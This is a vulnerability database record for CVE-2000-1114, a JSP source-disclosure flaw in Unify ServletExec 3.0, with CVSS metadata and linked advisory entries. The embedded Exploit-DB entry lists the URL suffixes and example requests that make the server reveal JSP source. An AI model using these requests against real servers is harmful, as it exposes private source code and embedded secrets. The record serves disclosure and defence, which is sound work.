Search...

CVE-2000-1114

2001-01-09T05:00:00

ID CVE-2000-1114
Type cve
Reporter cve@mitre.org
Modified 2008-09-05T20:22:00

Description

Unify ServletExec AS v3.0C allows remote attackers to read source code for JSP pages via an HTTP request that ends with characters such as ".", or "+", or "%20".

JSON Vulners Source

Initial Source

{"id": "CVE-2000-1114", "bulletinFamily": "NVD", "title": "CVE-2000-1114", "description": "Unify ServletExec AS v3.0C allows remote attackers to read source code for JSP pages via an HTTP request that ends with characters such as \".\", or \"+\", or \"%20\".", "published": "2001-01-09T05:00:00", "modified": "2008-09-05T20:22:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1114", "reporter": "cve@mitre.org", "references": ["http://www.securityfocus.com/bid/1970", "http://archives.neohapsis.com/archives/bugtraq/2000-11/0285.html"], "cvelist": ["CVE-2000-1114"], "type": "cve", "lastseen": "2019-05-29T18:07:37", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d431d18d6836d26f813a0e3f235ed356"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "9eb2ae92a1860ca314ca98a9f9ea3fee"}, {"key": "cpe23", "hash": "6f2088d3164dcbf75d6732076dee7bf4"}, {"key": "cvelist", "hash": "799326288ed288849e79430e6c683f7d"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "cvss2", "hash": "f30109dfdbfbf783c0b61792a6b2c20a"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "6f76c9e47f639b8c86cdc8c471b9d8ef"}, {"key": "href", "hash": "69e7bf8de5d010fb0472612b612c8d24"}, {"key": "modified", "hash": "4dd837b7057a28d17556a5a0cc39194f"}, {"key": "published", "hash": "eaf343a7169d9958e09a698aeda7a33f"}, {"key": "references", "hash": "9f8b81d2c7f1604004a8fb3bed849916"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "c7321e23006378c36be579469daa8b7e"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "71a117c943e5ca395af279062e3fe1c5546901bfecafcc20d3e156d275bb3abb", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:6658"]}, {"type": "exploitdb", "idList": ["EDB-ID:20412"]}], "modified": "2019-05-29T18:07:37"}, "score": {"value": 7.2, "vector": "NONE", "modified": "2019-05-29T18:07:37"}, "vulnersScore": 7.2}, "objectVersion": "1.3", "cpe": ["cpe:/a:unify:ewave_servletexec:3.0", "cpe:/a:unify:ewave_servletexec:3.0c"], "affectedSoftware": [{"name": "unify ewave_servletexec", "operator": "eq", "version": "3.0c"}, {"name": "unify ewave_servletexec", "operator": "eq", "version": "3.0"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:unify:ewave_servletexec:3.0c:*:*:*:*:*:*:*", "cpe:2.3:a:unify:ewave_servletexec:3.0:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"]}

{"osvdb": [{"lastseen": "2017-04-28T13:20:01", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2000-11/0285.html\n[CVE-2000-1114](https://vulners.com/cve/CVE-2000-1114)\nBugtraq ID: 1970\n", "modified": "2000-11-21T00:00:00", "published": "2000-11-21T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:6658", "id": "OSVDB:6658", "type": "osvdb", "title": "Unify ServletExec JSP Source Disclosure", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-02T14:12:19", "bulletinFamily": "exploit", "description": "Unify eWave ServletExec 3 JSP Source Disclosure Vulnerability. CVE-2000-1114. Remote exploit for jsp platform", "modified": "2000-11-21T00:00:00", "published": "2000-11-21T00:00:00", "id": "EDB-ID:20412", "href": "https://www.exploit-db.com/exploits/20412/", "type": "exploitdb", "title": "Unify eWave ServletExec 3 JSP Source Disclosure Vulnerability", "sourceData": "source : http://www.securityfocus.com/bid/1970/info\r\n\r\nUnify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers such as Microsoft IIS, Apache, Netscape Enterprise Server, etc. \r\n\r\nServletExec will return the source code of JSP files when a HTTP request is appended with one of the following characters:\r\n\r\n.\r\n%2E\r\n+\r\n%2B\r\n%5C\r\n%20\r\n%00\r\n\r\nFor example, the following URL will yield the source of the specified JSP file:\r\n\r\nhttp://target/directory/jsp/file.jsp.\r\n\r\nSuccessful exploitation could lead to the disclosure of sensitive information contained within JSP pages.\r\n\r\nAny of the following URL requests will yield the source of the specified JSP file:\r\n\r\nhttp://target/directory/jsp/file.jsp. \r\nhttp://target/directory/jsp/file.jsp%2E\r\nhttp://target/directory/jsp/file.jsp+ \r\nhttp://target/directory/jsp/file.jsp%2B\r\nhttp://target/directory/jsp/file.jsp\\ \r\nhttp://target/directory/jsp/file.jsp%5C\r\nhttp://target/directory/jsp/file.jsp%20 \r\nhttp://target/directory/jsp/file.jsp%00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/20412/"}]}